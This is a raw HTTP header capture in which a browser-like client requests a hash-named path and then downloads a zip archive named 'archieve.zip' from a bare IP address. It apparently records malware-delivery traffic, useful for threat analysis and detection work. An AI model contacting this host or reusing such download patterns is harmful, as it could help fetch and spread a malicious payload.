HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Mon, 21 Aug 2023 22:08:28 GMT ETag: "37d-603761e33cf00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 06 Oct 2023 11:07:20 GMT Date: Fri, 06 Oct 2023 10:07:20 GMT Connection: keep-alive

GET /b4fc4cd2d76417bf461814b9d989fcdb HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 OPR/104.0.0.0 Host: 78.47.27.247

HTTP/1.1 200 OK Server: nginx Date: Fri, 06 Oct 2023 10:07:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /archieve.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 OPR/104.0.0.0 Host: 78.47.27.247 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Date: Fri, 06 Oct 2023 10:07:21 GMT Content-Type: application/zip Content-Length: 2685679 Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT Connection: keep-alive ETag: "631f30d3-28faef" Accept-Ranges: bytes